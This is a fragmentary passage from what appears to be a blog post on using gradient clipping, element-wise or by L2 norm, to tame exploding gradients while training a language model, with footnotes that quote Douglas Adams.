possibility. Exploding gradients. This is my working hypothesis, and so in this post I'll try out gradient clipping, the normal solution to that problem. I. Goodfellow, Y. Bengio, and A. Courville. Deep Learning (2016), MIT Press. We clip element-wise. If any one of the gradients in the vector is larger than v , we reduce it to v . We clip based on the norm: the length of the gradient vector in -- in our case -- 163M-dimensional space. That sounds harder than it is -- it's really just an extension of the Pythagorean equation that a 2 + b 2 = c 2 to multiple dimensions. If you want to work out the length of a vector ( a , b ) then you can use Pythagoras to work out c = a 2 + b 2 , and that generalises to any number of dimensions. So for our model we'd just square all 163M elements of the vector, sum those, and take the square root of the result, and that's the norm. 2 If the norm is greater than v , we just divide every element of the gradient vector by the norm and multiply the result by v , to produce a new gradient vector whose norm is v . Whether we actually did wind up clipping them and fixing those loss spikes Whether we were clipping at other times -- we don't want to be doing it unnecessarily. Blindly apply them and expect the developer to sanitise their inputs. Raise an error. Take some kind of default sane action, like skipping the update. It can get very large, still be finite, and have a finite norm. It can get very large, still be finite, but have an infinite norm (eg. due to numerical overflow) It can become infinite -- that is, at least one of the parameters' gradients is infinite (which of course means an infinite norm regardless of any numerical stuff). Oh my .  ↩ Technically the L2 norm -- if you used cubes/cube root it would be L3, and likewise for the power of four and L4 and so on. But the L2 is the one used for gradient clipping.  ↩ Shades of Douglas Adams , really: "But the plans were on display..." "On display? I eventually had to go down to the cellar to find them." “That’s the display department." “With a flashlight." “Ah, well, the lights had probably gone." “So had the stairs." “But look, you found the notice, didn’t you?" “Yes," said Arthur, “yes I did. It was on display in the bottom of a locked filing cabinet stuck in a disused lavatory with a sign on the door saying ‘Beware of the Leopard."  ↩

1 views